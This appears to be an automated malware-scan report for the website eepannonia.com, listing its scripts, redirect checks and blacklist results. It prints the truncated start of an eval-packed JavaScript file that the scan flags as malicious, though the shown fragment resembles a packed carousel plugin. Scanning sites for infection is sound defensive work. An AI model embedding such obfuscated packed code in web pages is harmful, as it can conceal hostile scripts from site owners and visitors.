Scanned pages/files
Request | Server response | Status |
http://eepannonia.com/ | HTTP/1.1 303 See other Connection: close Date: Sat, 26 Apr 2014 23:35:48 GMT Location: http://eepannonia.com/hu/ Server: Apache/2.2.22 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Set-Cookie: 6fb9afda45ef117213673774a50b194b=ebf859bdd520abfffbbfd09e84ed188f; path=/; HttpOnly X-Powered-By: PHP/5.3.10-1ubuntu3.4 | clean |
http://eepannonia.com/hu/ | 200 OK Content-Length: 37471 Content-Type: text/html | clean |
http://eepannonia.com/media/jui/js/jquery.min.js | 200 OK Content-Length: 96381 Content-Type: application/javascript | clean |
http://eepannonia.com/media/jui/js/jquery-noconflict.js | 200 OK Content-Length: 21 Content-Type: application/javascript | clean |
http://eepannonia.com/media/jui/js/jquery-migrate.min.js | 200 OK Content-Length: 7199 Content-Type: application/javascript | clean |
http://eepannonia.com/media/system/js/tabs-state.js | 200 OK Content-Length: 1829 Content-Type: application/javascript | clean |
http://eepannonia.com/media/system/js/caption.js | 200 OK Content-Length: 501 Content-Type: application/javascript | clean |
http://eepannonia.com/media/jui/js/bootstrap.min.js | 200 OK Content-Length: 29156 Content-Type: application/javascript | clean |
http://eepannonia.com/templates/imbus/js/jquery.scripts.js | 200 OK Content-Length: 28458 Content-Type: application/javascript | clean |
http://eepannonia.com/templates/imbus/js/jquery.inview.js | 200 OK Content-Length: 2095 Content-Type: application/javascript | clean |
http://eepannonia.com/templates/imbus/js/jquery.lavalamp-1.3.5.min.js | 200 OK Content-Length: 3464 Content-Type: application/javascript | clean |
http://eepannonia.com/templates/imbus/js/jquery.easing.1.3.js | 200 OK Content-Length: 8097 Content-Type: application/javascript | clean |
http://eepannonia.com/templates/imbus/js/jquery.magnific-popup.min.js | 200 OK Content-Length: 20747 Content-Type: application/javascript | clean |
http://eepannonia.com/templates/imbus/js/jquery.carousel.min.js | 200 OK Content-Length: 36109 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('(C($){8($.1r.1v){G}$.1r.6o=$.1r.1v=C(u,w){8(1k.S==0){18(I,\'6p 53 7P 1j "\'+1k.4k+\'".\');G 1k}8(1k.S>1){G 1k.1W(C(){$(1k).1v(u,w)})}E y=1k,$14=1k[ Antivirus reports:
| ||
http://eepannonia.com/templates/imbus/js/jquery.tipsy.js | 200 OK Content-Length: 9787 Content-Type: application/javascript | clean |
http://eepannonia.com/media/com_acymailing/js/acymailing_module.js?v=462 | 200 OK Content-Length: 14287 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: eepannonia.com
Result:
HTTP/1.1 303 See other
Connection: close
Date: Sat, 26 Apr 2014 23:35:48 GMT
Location: http://eepannonia.com/hu/
Server: Apache/2.2.22 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Set-Cookie: 6fb9afda45ef117213673774a50b194b=ebf859bdd520abfffbbfd09e84ed188f; path=/; HttpOnly
X-Powered-By: PHP/5.3.10-1ubuntu3.4
GET / HTTP/1.1
Host: eepannonia.com
Result:
HTTP/1.1 303 See other
Connection: close
Date: Sat, 26 Apr 2014 23:35:48 GMT
Location: http://eepannonia.com/hu/
Server: Apache/2.2.22 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Set-Cookie: 6fb9afda45ef117213673774a50b194b=ebf859bdd520abfffbbfd09e84ed188f; path=/; HttpOnly
X-Powered-By: PHP/5.3.10-1ubuntu3.4
Second query (visit from search engine):
GET / HTTP/1.1
Host: eepannonia.com
Referer: http://www.google.com/search?q=eepannonia.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: eepannonia.com
Referer: http://www.google.com/search?q=eepannonia.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=eepannonia.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://eepannonia.com/
Result: eepannonia.com is not infected or malware details are not published yet.
Result: eepannonia.com is not infected or malware details are not published yet.